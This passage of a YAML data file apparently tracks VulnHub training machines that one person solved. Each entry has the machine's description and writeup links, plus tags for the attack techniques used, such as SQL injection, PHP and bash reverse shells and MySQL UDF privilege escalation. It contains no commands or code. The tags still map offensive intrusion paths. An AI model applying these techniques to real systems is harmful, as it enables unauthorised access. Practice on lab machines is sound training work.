      writeupmdurl: https://github.com/7h3rAm/writeups/blob/master/vulnhub.infosecpreposcp/writeup.md
      writeuppdfurl: https://github.com/7h3rAm/writeups/blob/master/vulnhub.infosecpreposcp/writeup.pdf
      writeups:
        7h3rAm:
          ttps:
            enumerate:
            - enumerate_proto_http
            exploit:
            - exploit_ssh_privatekeys
            privesc:
            - privesc_lxc_bash
    name: 'InfoSec Prep: OSCP'
    overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.infosecpreposcp/killchain.png"
      width="100" height="100" />
    points: 10
    status: public
    tags:
    - enumerate_proto_http
    - exploit_ssh_privatekeys
    - privesc_lxc_bash
    url: https://www.vulnhub.com/entry/infosec-prep-oscp,508/
    writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.infosecpreposcp/writeup.pdf
  - datetime: 20190928
    infra: VulnHub
    machine:
      description: 'This Kioptrix VM Image are easy challenges. The object of the
        game is to acquire root access via any means possible (except actually hacking
        the VM server or player).

        The purpose of these games are to learn the basic tools and techniques in
        vulnerability assessment and exploitation. There are more ways then one to
        successfully complete the challenges.

        Source: http://www.kioptrix.com/blog/?page_id=135

        Source: http://www.kioptrix.com/blog/?p=49'
      difficulty: null
      difficulty_ratings: null
      id: 22
      infrastructure: vulnhub
      killchainurl: https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix1/killchain.png
      maker:
        id: 8
        name: Kioptrix
        url: https://www.vulnhub.com/author/kioptrix,8/
      matrixurl: null
      name: 'Kioptrix: Level 1 (#1)'
      os: Linux
      oscplike: true
      owned_root: true
      owned_user: true
      points: null
      private: false
      ratingsurl: null
      release: 17 Feb 2010
      series:
        id: 8
        name: Kioptrix
        url: https://www.vulnhub.com/series/kioptrix,8/
      shortname: 'kioptrix: level 1 (#1)'
      url: https://www.vulnhub.com/entry/kioptrix-level-1-1,22/
      verbose_id: vulnhub#22
      writeupmdurl: https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix1/writeup.md
      writeuppdfurl: https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix1/writeup.pdf
      writeups:
        7h3rAm:
          ttps:
            enumerate: []
            exploit:
            - exploit_modssl
            privesc:
            - privesc_modssl
    name: 'Kioptrix: Level 1 (#1)'
    overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix1/killchain.png"
      width="100" height="100" />
    points: 20
    status: public
    tags:
    - exploit_modssl
    - privesc_modssl
    url: https://www.vulnhub.com/entry/kioptrix-level-1-1,22/
    writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix1/writeup.pdf
  - datetime: 20190928
    infra: VulnHub
    machine:
      description: 'This Kioptrix VM Image are easy challenges. The object of the
        game is to acquire root access via any means possible (except actually hacking
        the VM server or player).

        The purpose of these games are to learn the basic tools and techniques in
        vulnerability assessment and exploitation. There are more ways then one to
        successfully complete the challenges.

        Source: http://www.kioptrix.com/blog/?page_id=135

        Source: http://www.kioptrix.com/blog/?p=49

        This is the second release of #2. First release had a bug in it with the web
        application

        2012/Feb/09: Re-releases

        2011/Feb/11: Original Release'
      difficulty: null
      difficulty_ratings: null
      id: 23
      infrastructure: vulnhub
      killchainurl: https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix2/killchain.png
      maker:
        id: 8
        name: Kioptrix
        url: https://www.vulnhub.com/author/kioptrix,8/
      matrixurl: null
      name: 'Kioptrix: Level 1.1 (#2)'
      os: Linux
      oscplike: true
      owned_root: true
      owned_user: true
      points: null
      private: false
      ratingsurl: null
      release: 11 Feb 2011
      series:
        id: 8
        name: Kioptrix
        url: https://www.vulnhub.com/series/kioptrix,8/
      shortname: 'kioptrix: level 1.1 (#2)'
      url: https://www.vulnhub.com/entry/kioptrix-level-11-2,23/
      verbose_id: vulnhub#23
      writeupmdurl: https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix2/writeup.md
      writeuppdfurl: https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix2/writeup.pdf
      writeups:
        7h3rAm:
          ttps:
            enumerate: []
            exploit:
            - exploit_sqli
            - exploit_cmdexec
            privesc:
            - privesc_kernel_ipappend
    name: 'Kioptrix: Level 1.1 (#2)'
    overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix2/killchain.png"
      width="100" height="100" />
    points: 20
    status: public
    tags:
    - exploit_sqli
    - exploit_cmdexec
    - privesc_kernel_ipappend
    url: https://www.vulnhub.com/entry/kioptrix-level-11-2,23/
    writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix2/writeup.pdf
  - datetime: 20190929
    infra: VulnHub
    machine:
      description: "It's been a while since the last Kioptrix VM challenge. Life keeps\
        \ getting the way of these things you know.\nAfter the seeing the number of\
        \ downloads for the last two, and the numerous videos showing ways to beat\
        \ these challenges. I felt that 1.2 (or just level 3) needed to come out.\
        \ Thank you to all that downloaded and played the first two. And thank you\
        \ to the ones that took the time to produce video solutions of them. Greatly\
        \ appreciated.\nAs with the other two, this challenge is geared towards the\
        \ beginner. It is however different. Added a few more steps and a new skill\
        \ set is required. Still being the realm of the beginner I must add. The same\
        \ as the others, there\u2019s more then one way to \u201Cpwn\u201D this one.\
        \ There\u2019s easy and not so easy.\nRemember\u2026 the sense of \u201Ceasy\u201D\
        \ or \u201Cdifficult\u201D is always relative to ones own skill level. I never\
        \ said these things were exceptionally hard or difficult, but we all need\
        \ to start somewhere. And let me tell you, making these vulnerable VMs is\
        \ not as easy as it looks\u2026\nImportant thing with this challenge. Once\
        \ you find the IP (DHCP Client) edit your hosts file and point it to kioptrix3.com\n\
        Under Windows, you would edit C:\\Windows\\System32\\drivers\\etc\\hosts to\
        \ look something like this:\nUnder Linux that would be /etc/hosts\nThere\u2019\
        s a web application involved, so to have everything nice and properly displayed\
        \ you really need to this.\nHope you enjoy Kioptrix VM Level 1.2 challenge.\n\
        452 Megs\nMD5 Hash : d324ffadd8e3efc1f96447eec51901f2\nHave fun\nSource: http://www.kioptrix.com/blog/?p=358"
      difficulty: null
      difficulty_ratings: null
      id: 24
      infrastructure: vulnhub
      killchainurl: https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix3/killchain.png
      maker:
        id: 8
        name: Kioptrix
        url: https://www.vulnhub.com/author/kioptrix,8/
      matrixurl: null
      name: 'Kioptrix: Level 1.2 (#3)'
      os: Linux
      oscplike: true
      owned_root: true
      owned_user: true
      points: null
      private: false
      ratingsurl: null
      release: 18 Apr 2011
      series:
        id: 8
        name: Kioptrix
        url: https://www.vulnhub.com/series/kioptrix,8/
      shortname: 'kioptrix: level 1.2 (#3)'
      url: https://www.vulnhub.com/entry/kioptrix-level-12-3,24/
      verbose_id: vulnhub#24
      writeupmdurl: https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix3/writeup.md
      writeuppdfurl: https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix3/writeup.pdf
      writeups:
        7h3rAm:
          ttps:
            enumerate: []
            exploit:
            - exploit_lotuscms
            privesc:
            - privesc_sudoers
            - privesc_sudo
    name: 'Kioptrix: Level 1.2 (#3)'
    overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix3/killchain.png"
      width="100" height="100" />
    points: 20
    status: public
    tags:
    - exploit_lotuscms
    - privesc_sudoers
    - privesc_sudo
    url: https://www.vulnhub.com/entry/kioptrix-level-12-3,24/
    writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix3/writeup.pdf
  - datetime: 20191008
    infra: VulnHub
    machine:
      description: "Again a long delay between VMs, but that cannot be helped. Work,\
        \ family must come first. Blogs and hobbies are pushed down the list. These\
        \ things aren\u2019t as easy to make as one may think. Time and some planning\
        \ must be put into these challenges, to make sure that:\n1. It\u2019s possible\
        \ to get root remotely [ Edit: sorry not what I meant ]\n1a. It\u2019s possible\
        \ to remotely compromise the machine\nStays within the target audience of\
        \ this site\nMust be \u201Crealistic\u201D (well kinda\u2026)\nShould serve\
        \ as a refresher for me. Be it PHP or MySQL usage etc. Stuff I haven\u2019\
        t done in a while.\nI also had lots of troubles exporting this one. So please\
        \ take the time to read my comments at the end of this post.\nKeeping in the\
        \ spirit of things, this challenge is a bit different than the others but\
        \ remains in the realm of the easy. Repeating myself I know, but things must\
        \ always be made clear:\nThese VMs are for the beginner. It\u2019s a place\
        \ to start.\nI\u2019d would love to code some small custom application for\
        \ people to exploit. But I\u2019m an administrator not a coder. It would take\
        \ too much time to learn/code such an application. Not saying I\u2019ll never\
        \ try doing one, but I wouldn\u2019t hold my breath. If someone wants more\
        \ difficult challenges, I\u2019m sure the Inter-tubes holds them somewhere.\n\
        Or you can always enroll in Offsec\u2019s PWB course. *shameless plug\n--\
        \ A few things I must say. I made this image using a new platform. Hoping\
        \ everything works but I can\u2019t test for everything. Initially the VM\
        \ had troubles getting an IP on boot-up. For some reason the NIC wouldn\u2019\
        t go up and the machine was left with the loopback interface. I hope that\
        \ I fixed the problem. Don\u2019t be surprised if it takes a little moment\
        \ for this one to boot up. It\u2019s trying to get an IP. Be a bit patient.\n\
        Someone that tested the image for me also reported the VM hung once powered\
        \ on. Upon restart all was fine. Just one person reported this, so hoping\
        \ it\u2019s not a major issue. If you plan on running this on vmFusion, you\
        \ may need to convert the imagine to suit your fusion version.\n-- Also adding\
        \ the VHD file for download, for those using Hyper-V. You guys may need to\
        \ change the network adapter to \u201CLegacy Network Adapter\u201D. I\u2019\
        ve test the file and this one seems to run fine for me\u2026\nIf you\u2019\
        re having problems, or it\u2019s not working for any reason email comms[=]kioptrix.com\n\
        Thanks to @shai_saint from www.n00bpentesting.com for the much needed testing\
        \ with various VM solutions.\nThanks to Patrick from Hackfest.ca for also\
        \ running the VM and reporting a few issues. And Swappage & @Tallenz for doing\
        \ the same. All help is appreciated guys \nSo I hope you enjoy this one.\n\
        The Kioptrix Team\nSource: http://www.kioptrix.com/blog/?p=604"
      difficulty: null
      difficulty_ratings: null
      id: 25
      infrastructure: vulnhub
      killchainurl: https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix4/killchain.png
      maker:
        id: 8
        name: Kioptrix
        url: https://www.vulnhub.com/author/kioptrix,8/
      matrixurl: null
      name: 'Kioptrix: Level 1.3 (#4)'
      os: Linux
      oscplike: true
      owned_root: true
      owned_user: true
      points: null
      private: false
      ratingsurl: null
      release: 8 Feb 2012
      series:
        id: 8
        name: Kioptrix
        url: https://www.vulnhub.com/series/kioptrix,8/
      shortname: 'kioptrix: level 1.3 (#4)'
      url: https://www.vulnhub.com/entry/kioptrix-level-13-4,25/
      verbose_id: vulnhub#25
      writeupmdurl: https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix4/writeup.md
      writeuppdfurl: https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix4/writeup.pdf
      writeups:
        7h3rAm:
          ttps:
            enumerate: []
            exploit:
            - exploit_sqli
            - exploit_credsreuse
            privesc:
            - privesc_shell_escape
            - privesc_mysql_root
            - privesc_mysql_udf
    name: 'Kioptrix: Level 1.3 (#4)'
    overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix4/killchain.png"
      width="100" height="100" />
    points: 20
    status: public
    tags:
    - exploit_sqli
    - exploit_credsreuse
    - privesc_shell_escape
    - privesc_mysql_root
    - privesc_mysql_udf
    url: https://www.vulnhub.com/entry/kioptrix-level-13-4,25/
    writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix4/writeup.pdf
  - datetime: 20191009
    infra: VulnHub
    machine:
      description: "100% works with VMware player6, workstation 10 & fusion 6.\nMay\
        \ have issues with ViritualBox \nIf this is the case, try this 'fix': http://download.vulnhub.com/kioptrix/kiop2014_fix.zip\
        \ - Step by Step screenshots for Virtualbox 4.3 & VMware Workstation 9)\n\
        As usual, this vulnerable machine is targeted at the beginner. It's not meant\
        \ for the seasoned pentester or security geek that's been at this sort of\
        \ stuff for 10 years. Everyone needs a place to start and all I want to do\
        \ is help in that regard.\nAlso, before powering on the VM I suggest you remove\
        \ the network card and re-add it. For some oddball reason it doesn't get its\
        \ IP (well I do kinda know why but don't want to give any details away). So\
        \ just add the VM to your virtualization software, remove and then add a network\
        \ card. Set it to bridge mode and you should be good to go.\nThis was created\
        \ using ESX 5.0 and tested on Fusion, but shouldn't be much of a problem on\
        \ other platforms.\nKioptrix VM 2014 download 825Megs\nMD5 (kiop2014.tar.bz2)\
        \ = 1f802308f7f9f52a7a0d973fbda22c0a\nSHA1 (kiop2014.tar.bz2) = 116eb311b91b28731855575a9157043666230432\n\
        Waist line 32\"\np.s.: Don't forget to read my disclaimer..."
      difficulty: null
      difficulty_ratings: null
      id: 62
      infrastructure: vulnhub
      killchainurl: https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix5/killchain.png
      maker:
        id: 8
        name: Kioptrix
        url: https://www.vulnhub.com/author/kioptrix,8/
      matrixurl: null
      name: 'Kioptrix: 2014 (#5)'
      os: BSD
      oscplike: true
      owned_root: true
      owned_user: true
      points: null
      private: false
      ratingsurl: null
      release: 6 Apr 2014
      series:
        id: 8
        name: Kioptrix
        url: https://www.vulnhub.com/series/kioptrix,8/
      shortname: 'kioptrix: 2014 (#5)'
      url: https://www.vulnhub.com/entry/kioptrix-2014-5,62/
      verbose_id: vulnhub#62
      writeupmdurl: https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix5/writeup.md
      writeuppdfurl: https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix5/writeup.pdf
      writeups:
        7h3rAm:
          ttps:
            enumerate: []
            exploit:
            - exploit_pchart
            - exploit_phptax
            privesc:
            - privesc_freebsd
    name: 'Kioptrix: 2014 (#5)'
    overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix5/killchain.png"
      width="100" height="100" />
    points: 20
    status: public
    tags:
    - exploit_pchart
    - exploit_phptax
    - privesc_freebsd
    url: https://www.vulnhub.com/entry/kioptrix-2014-5,62/
    writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix5/writeup.pdf
  - datetime: 20191029
    infra: VulnHub
    machine:
      description: "Name: LazySysAdmin 1.0\nAuthor: Togie Mcdogie\nTwitter: @TogieMcdogie\
        \ \n[Description]\nDifficulty: Beginner - Intermediate\nBoot2root created\
        \ out of frustration from failing my first OSCP exam attempt.\nAimed at:\n\
        Special thanks to @RobertWinkel @dooktwit for hosting LazySysAdmin at Sectalks\
        \ Brisbane BNE0x18\n[Lore]\nLazySysadmin - The story of a lonely and lazy\
        \ sysadmin who cries himself to sleep\n[Tested with]\n[Preffered setup]\n\
        Host only networking\n[Hints]\n[Other]\n[Checksum]"
      difficulty: null
      difficulty_ratings: null
      id: 205
      infrastructure: vulnhub
      killchainurl: https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/killchain.png
      maker:
        id: 561
        name: Togie Mcdogie
        url: https://www.vulnhub.com/author/togie-mcdogie,561/
      matrixurl: null
      name: 'LazySysAdmin: 1'
      os: Linux
      oscplike: true
      owned_root: true
      owned_user: true
      points: null
      private: false
      ratingsurl: null
      release: 20 Sep 2017
      series:
        id: 133
        name: LazySysAdmin
        url: https://www.vulnhub.com/series/lazysysadmin,133/
      shortname: 'lazysysadmin: 1'
      url: https://www.vulnhub.com/entry/lazysysadmin-1,205/
      verbose_id: vulnhub#205
      writeupmdurl: https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/writeup.md
      writeuppdfurl: https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/writeup.pdf
      writeups:
        7h3rAm:
          ttps:
            enumerate:
            - enumerate_app_wordpress
            exploit:
            - exploit_smb_nullsession
            - exploit_smb_web_root
            - exploit_php_reverseshell
            - exploit_credsreuse
            - exploit_wordpress_template
            privesc:
            - privesc_sudo
    name: 'LazySysAdmin: 1'
    overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/killchain.png"
      width="100" height="100" />
    points: 20
    status: public
    tags:
    - enumerate_app_wordpress
    - exploit_smb_nullsession
    - exploit_smb_web_root
    - exploit_php_reverseshell
    - exploit_credsreuse
    - exploit_wordpress_template
    - privesc_sudo
    url: https://www.vulnhub.com/entry/lazysysadmin-1,205/
    writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/writeup.pdf
  - datetime: 20191010
    infra: VulnHub
    machine:
      description: "Here at in.security we wanted to develop a Linux virtual machine\
        \ that is based, at the time of writing, on an up-to-date Ubuntu distro (18.04\
        \ LTS), but suffers from a number of vulnerabilities that allow a user to\
        \ escalate to root on the box. This has been designed to help understand how\
        \ certain built-in applications and services if misconfigured, may be abused\
        \ by an attacker.\nWe have configured the box to simulate real-world vulnerabilities\
        \ (albeit on a single host) which will help you to perfect your local privilege\
        \ escalation skills, techniques and toolsets. There are a number challenges\
        \ which range from fairly easy to intermediate level and we\u2019re excited\
        \ to see the methods you use to solve them!\nThe image is just under 1.7 GB\
        \ and can be downloaded using the link above. On opening the OVA file a VM\
        \ named lin.security will be imported and configured with a NAT adapter, but\
        \ this can be changed to bridged via the the preferences of your preferred\
        \ virtualisation platform.\nTo get started you can log onto the host with\
        \ the credentials: bob/secret"
      difficulty: null
      difficulty_ratings: null
      id: 244
      infrastructure: vulnhub
      killchainurl: https://github.com/7h3rAm/writeups/blob/master/vulnhub.linsecurity1/killchain.png
      maker:
        id: 588
        name: In.security
        url: https://www.vulnhub.com/author/insecurity,588/
      matrixurl: null
      name: 'Lin.Security: 1'
      os: Linux
      oscplike: true
      owned_root: true
      owned_user: true
      points: null
      private: false
      ratingsurl: null
      release: 11 Jul 2018
      series:
        id: 165
        name: Lin.Security
        url: https://www.vulnhub.com/series/linsecurity,165/
      shortname: 'lin.security: 1'
      url: https://www.vulnhub.com/entry/linsecurity-1,244/
      verbose_id: vulnhub#244
      writeupmdurl: https://github.com/7h3rAm/writeups/blob/master/vulnhub.linsecurity1/writeup.md
      writeuppdfurl: https://github.com/7h3rAm/writeups/blob/master/vulnhub.linsecurity1/writeup.pdf
      writeups:
        7h3rAm:
          ttps:
            enumerate: []
            exploit:
            - exploit_nfs_rw
            - exploit_ssh_authorizedkeys
            privesc:
            - privesc_strace_setuid
            - privesc_docker_group
    name: 'Lin.Security: 1'
    overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.linsecurity1/killchain.png"
      width="100" height="100" />
    points: 30
    status: public
    tags:
    - exploit_nfs_rw
    - exploit_ssh_authorizedkeys
    - privesc_strace_setuid
    - privesc_docker_group
    url: https://www.vulnhub.com/entry/linsecurity-1,244/
    writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.linsecurity1/writeup.pdf
  - datetime: 20191010
    infra: VulnHub
    machine:
      description: "I created this machine to help others learn some basic CTF hacking\
        \ strategies and some tools. I aimed this machine to be very similar in difficulty\
        \ to those I was breaking on the OSCP.\nThis is a boot-to-root machine will\
        \ not require any guest interaction.\nThere are two designed methods for privilege\
        \ escalation.\nIf you are having issues with VirtualBox, try the following:\
        \ \nModified the OVF using text editor, and did the following:\nreplaced all\
        \ references to \"ElementName\" with \"Caption\"\nreplaced the single reference\
        \ to \"vmware.sata.ahci\" with \"AHCI\"\nSaved the OVF.\n+Deleted the .mf\
        \ (Manifest) file. If you don't you get an error when importing, saying the\
        \ SHA doesn't match for the OVF (I also tried modifying the hash, but no luck).\n\
        Source: https://twitter.com/dooktwit/status/646840273482330112"
      difficulty: null
      difficulty_ratings: null
      id: 129
      infrastructure: vulnhub
      killchainurl: https://github.com/7h3rAm/writeups/blob/master/vulnhub.lordoftheroot101/killchain.png
      maker:
        id: 188
        name: KookSec
        url: https://www.vulnhub.com/author/kooksec,188/
      matrixurl: null
      name: 'Lord Of The Root: 1.0.1'
      os: Linux
      oscplike: true
      owned_root: true
      owned_user: true
      points: null
      private: false
      ratingsurl: null
      release: 23 Sep 2015
      series:
        id: 67
        name: Lord Of The Root
        url: https://www.vulnhub.com/series/lord-of-the-root,67/
      shortname: 'lord of the root: 1.0.1'
      url: https://www.vulnhub.com/entry/lord-of-the-root-101,129/
      verbose_id: vulnhub#129
      writeupmdurl: https://github.com/7h3rAm/writeups/blob/master/vulnhub.lordoftheroot101/writeup.md
      writeuppdfurl: https://github.com/7h3rAm/writeups/blob/master/vulnhub.lordoftheroot101/writeup.pdf
      writeups:
        7h3rAm:
          ttps:
            enumerate: []
            exploit:
            - exploit_sqli
            - exploit_credsreuse
            privesc:
            - privesc_kernel_overlayfs
            - privesc_mysql_root
            - privesc_mysql_udf
    name: 'Lord Of The Root: 1.0.1'
    overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.lordoftheroot101/killchain.png"
      width="100" height="100" />
    points: 30
    status: public
    tags:
    - exploit_sqli
    - exploit_credsreuse
    - privesc_kernel_overlayfs
    - privesc_mysql_root
    - privesc_mysql_udf
    url: https://www.vulnhub.com/entry/lord-of-the-root-101,129/
    writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.lordoftheroot101/writeup.pdf
  - datetime: 20191011
    infra: VulnHub
    machine:
      description: The purpose of this machine is to grant OSCP students further develop,
        strengthen, and practice their methodology for the exam.
      difficulty: null
      difficulty_ratings: null
      id: 371
      infrastructure: vulnhub
      killchainurl: https://github.com/7h3rAm/writeups/blob/master/vulnhub.misdirection1/killchain.png
      maker:
        id: 646
        name: FalconSpy
        url: https://www.vulnhub.com/author/falconspy,646/
      matrixurl: null
      name: 'Misdirection: 1'
      os: Linux
      oscplike: true
      owned_root: true
      owned_user: true
      points: null
      private: false
      ratingsurl: null
      release: 24 Sep 2019
      series:
        id: 246
        name: Misdirection
        url: https://www.vulnhub.com/series/misdirection,246/
      shortname: 'misdirection: 1'
      url: https://www.vulnhub.com/entry/misdirection-1,371/
      verbose_id: vulnhub#371
      writeupmdurl: https://github.com/7h3rAm/writeups/blob/master/vulnhub.misdirection1/writeup.md
      writeuppdfurl: https://github.com/7h3rAm/writeups/blob/master/vulnhub.misdirection1/writeup.pdf
      writeups:
        7h3rAm:
          ttps:
            enumerate: []
            exploit:
            - exploit_php_webshell
            - exploit_bash_reverseshell
            privesc:
            - privesc_sudoers
            - privesc_passwd_writable
    name: 'Misdirection: 1'
    overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.misdirection1/killchain.png"
      width="100" height="100" />
    points: 20
    status: public
    tags:
    - exploit_php_webshell
    - exploit_bash_reverseshell
    - privesc_sudoers
    - privesc_passwd_writable
    url: https://www.vulnhub.com/entry/misdirection-1,371/
    writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.misdirection1/writeup.pdf
  - datetime: 20191017
    infra: VulnHub
    machine:
      description: ''
      difficulty: null
      difficulty_ratings: null
      id: 187
      infrastructure: vulnhub
      killchainurl: https://github.com/7h3rAm/writeups/blob/master/vulnhub.moria11/killchain.png
      maker:
        id: 393
        name: abatchy
        url: https://www.vulnhub.com/author/abatchy,393/
      matrixurl: null
      name: 'Moria: 1.1'
      os: Linux
      oscplike: false
      owned_root: true
      owned_user: true
      points: null
      private: false
      ratingsurl: null
      release: 29 Apr 2017
      series:
        id: 116
        name: Moria
        url: https://www.vulnhub.com/series/moria,116/
      shortname: 'moria: 1.1'
      url: https://www.vulnhub.com/entry/moria-11,187/
      verbose_id: vulnhub#187
      writeupmdurl: https://github.com/7h3rAm/writeups/blob/master/vulnhub.moria11/writeup.md
      writeuppdfurl: https://github.com/7h3rAm/writeups/blob/master/vulnhub.moria11/writeup.pdf
      writeups:
        7h3rAm:
          ttps:
            enumerate: []
            exploit: []
            privesc:
            - privesc_ssh_knownhosts
    name: 'Moria: 1.1'
    overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.moria11/killchain.png"
      width="100" height="100" />
    points: 20
    status: public
    tags:
    - privesc_ssh_knownhosts
    url: https://www.vulnhub.com/entry/moria-11,187/
    writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.moria11/writeup.pdf
  - datetime: 20191021
    infra: VulnHub
    machine:
      description: "Based on the show, Mr. Robot. \nThis VM has three keys hidden\
        \ in different locations. Your goal is to find all three. Each key is progressively\
        \ difficult to find. \nThe VM isn't too difficult. There isn't any advanced\
        \ exploitation or reverse engineering. The level is considered beginner-intermediate."
      difficulty: null
      difficulty_ratings: null
      id: 151
      infrastructure: vulnhub
      killchainurl: https://github.com/7h3rAm/writeups/blob/master/vulnhub.mrrobot1/killchain.png
      maker:
        id: 292
        name: Leon Johnson
        url: https://www.vulnhub.com/author/leon-johnson,292/
      matrixurl: null
      name: 'Mr-Robot: 1'
      os: Linux
      oscplike: true
      owned_root: true
      owned_user: true
      points: null
      private: false
      ratingsurl: null
      release: 28 Jun 2016
      series:
        id: 84
        name: Mr-Robot
        url: https://www.vulnhub.com/series/mr-robot,84/
      shortname: 'mr-robot: 1'
      url: https://www.vulnhub.com/entry/mr-robot-1,151/
      verbose_id: vulnhub#151
      writeupmdurl: https://github.com/7h3rAm/writeups/blob/master/vulnhub.mrrobot1/writeup.md
      writeuppdfurl: https://github.com/7h3rAm/writeups/blob/master/vulnhub.mrrobot1/writeup.pdf
      writeups:
        7h3rAm:
          ttps:
            enumerate: []
            exploit:
            - exploit_php_reverseshell
            privesc:
            - privesc_setuid
            - privesc_nmap
    name: 'Mr-Robot: 1'
    overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.mrrobot1/killchain.png"
      width="100" height="100" />
    points: 30
    status: public
    tags:
    - exploit_php_reverseshell
    - privesc_setuid
    - privesc_nmap
    url: https://www.vulnhub.com/entry/mr-robot-1,151/
    writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.mrrobot1/writeup.pdf
  - datetime: 20191028
    infra: VulnHub
    machine:
      description: 'Description: Node is a medium level boot2root challenge, originally
        created for HackTheBox. There are two flags to find (user and root flags)
        and multiple different technologies to play with. The OVA has been tested
        on both VMware and Virtual Box.'
      difficulty: null
      difficulty_ratings: null
      id: 252
      infrastructure: vulnhub
      killchainurl: https://github.com/7h3rAm/writeups/blob/master/vulnhub.node1/killchain.png
      maker:
        id: 593
        name: Rob
        url: https://www.vulnhub.com/author/rob,593/
      matrixurl: null
      name: 'Node: 1'
      os: Linux
      oscplike: true
      owned_root: true
      owned_user: true
      points: null
      private: false
      ratingsurl: null
      release: 7 Aug 2018
      series:
        id: 172
        name: Node
        url: https://www.vulnhub.com/series/node,172/
      shortname: 'node: 1'
      url: https://www.vulnhub.com/entry/node-1,252/
      verbose_id: vulnhub#252
      writeupmdurl: https://github.com/7h3rAm/writeups/blob/master/vulnhub.node1/writeup.md
      writeuppdfurl: https://github.com/7h3rAm/writeups/blob/master/vulnhub.node1/writeup.pdf
      writeups:
        7h3rAm:
          ttps:
            enumerate: []
            exploit:
            - exploit_nodejs
            - exploit_credsreuse
            - exploit_mongodb
            privesc:
            - privesc_setuid
    name: 'Node: 1'
    overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.node1/killchain.png"
      width="100" height="100" />
    points: 30
    status: public
    tags:
    - exploit_nodejs
    - exploit_credsreuse
    - exploit_mongodb
    - privesc_setuid
    url: https://www.vulnhub.com/entry/node-1,252/
    writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.node1/writeup.pdf
  - datetime: 20190918
    infra: VulnHub
    machine:
      description: 'Welcome to Quaoar

        This is a vulnerable machine i created for the Hackfest 2016 CTF

        http://hackfest.ca/

        Difficulty : Very Easy

        Tips:

        Here are the tools you can research to help you to own this machine.

        nmap

        dirb / dirbuster / BurpSmartBuster

        nikto

        wpscan

        hydra

        Your Brain

        Coffee

        Google :)

        Goals: This machine is intended to be doable by someone who is interested
        in learning computer security

        There are 3 flags on this machine

        1. Get a shell

        2. Get root access

        3. There is a post exploitation flag on the box

        Feedback: This is my first vulnerable machine, please give me feedback on
        how to improve !

        @ViperBlackSkull on Twitter

        [email protected]

        Special Thanks to madmantm for testing

        SHA-256 DA39EC5E9A82B33BA2C0CD2B1F5E8831E75759C51B3A136D3CB5D8126E2A4753'
      difficulty: null
      difficulty_ratings: null
      id: 180
      infrastructure: vulnhub
      killchainurl: https://github.com/7h3rAm/writeups/blob/master/vulnhub.quaoar/killchain.png
      maker:
        id: 475
        name: Viper
        url: https://www.vulnhub.com/author/viper,475/
      matrixurl: null
      name: 'hackfest2016: Quaoar'
      os: Linux
      oscplike: false
      owned_root: true
      owned_user: true
      points: null
      private: false
      ratingsurl: null
      release: 13 Mar 2017
      series:
        id: 111
        name: hackfest2016
        url: https://www.vulnhub.com/series/hackfest2016,111/
      shortname: 'hackfest2016: quaoar'
      url: https://www.vulnhub.com/entry/hackfest2016-quaoar,180/
      verbose_id: vulnhub#180
      writeupmdurl: https://github.com/7h3rAm/writeups/blob/master/vulnhub.quaoar/writeup.md
      writeuppdfurl: https://github.com/7h3rAm/writeups/blob/master/vulnhub.quaoar/writeup.pdf
      writeups:
        7h3rAm:
          ttps:
            enumerate:
            - enumerate_app_wordpress
            exploit:
            - exploit_wordpress_defaultcreds
            - exploit_wordpress_plugin_hellodolly
            - exploit_php_reverseshell
            privesc:
            - privesc_mysql_creds
            - privesc_credsreuse
    name: 'hackfest2016: Quaoar'
    overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.quaoar/killchain.png"
      width="100" height="100" />
    points: 20
    status: public
    tags:
    - enumerate_app_wordpress
    - exploit_wordpress_defaultcreds
